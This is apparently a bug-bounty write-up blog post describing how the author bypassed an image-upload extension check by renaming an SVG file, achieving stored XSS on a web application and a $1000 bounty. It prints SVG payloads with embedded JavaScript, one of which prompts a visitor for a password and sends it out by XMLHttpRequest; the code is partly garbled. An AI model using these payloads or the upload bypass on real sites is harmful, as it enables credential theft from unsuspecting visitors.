How I was rewarded a $1000 bounty after abusing File Upload functionality to Stored XSS Vulnerability leading to credential theft of a vistor in a website.

Hello CyberSecurity Researchers and Bug Hunters, I am posting a writeup after a quite a long time. I have been a bit busy lately due to my University Studies and also working on some Red Teaming skills.

Today I decided to post a writeup about a File Upload Vulnerability that lead to Stored XSS followed by Credential Theft of a victim who is given the url where file is uploaded. I think today,Bug Hunter focus more on finding Business logic vulnerabilities than technical ones like XSS, SQLI … Because of improved security of a Web Application. However, there are places still you can find technical vulnerabilities , like file upload which I will discuss further in my writeup.

  1. Logged into the webapplication using provided credentials.
  2. Did some manual enumeration:
  3. Application had so many web forms:

4) As you can see this form has variety of text fields , tried to find some Vulnerabilities like sqli,xss, ssti by manually fuzzing the form, no luck.

The Logo, Background Image and Advertisement Image caught my attention and I decided to upload some malicious crafted file and check what would happen.

5) Uploaded this file and it generated this error upon upload:

Image file format should be gif,png,jpg or jpeg

6) How I bypassed this :

Rename my file name from

“Fileupload.svg” to “Fileupload.svg.png”

Successfully Uploaded

7) Now I clicked on next and was redirected to an endpoint where the I was able to access these files.

All three files, as you can see the thumbnails uploaded.

8) Clicked View Image and Boom!

Svg File Payload Uploaded Here :

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “"><svg version=”1.1" baseProfile=”full” xmlns=”">

<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009901" stroke=”#004400"/>

<script type=”text/javascript”>

Taking it to Credential Theft by Modifying the Above Payload to :

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

var passwd = prompt("Enter your password to continue");
var xhr = new XMLHttpRequest();"GET",""+encodeURI(passwd));


9) Uploaded this modifed payload files again:

Different colors
Files Uploaded

10) Time to Access them:

Pressed next button after upload and accessed these.

11) I viewed the green svg image and web page started responding:

Password Entered
As you can see password got captured .

Initial Bounty Rewarded:

Additional Locations

Hope you liked the writeup. Happy Hacking !

Cheers :D

Kunal Khubchandani
Cyber Security Analyst | Penetration Tester | Bug Hunter




Student | Hacker | Pentester | Red Teamer | OSCP | OSCE | 19

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Unicrypt is driven by passion

The Way Forward with Cyber Security Target Operating Models

Discord: $7 billion Gamers Heaven at Risk

Ocean Protocol Secures V3 Contracts Implementation With CertiK

CIS Control v8 Overview- Control 17

How to keep your crypto assets safe and secure

PrivacySwap Referral Program

A Definitive Guide to Session Hijacking | Lucideus Research

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kunal Khubchandani

Kunal Khubchandani

Student | Hacker | Pentester | Red Teamer | OSCP | OSCE | 19

More from Medium

OTP bypass via response manipulation

Hunting for Bugs in File Upload Feature:

XSS - The LocalStorage Robbery

Bug type: Stored Cross Site Scripting (XSS) and HTML Injection — Part 2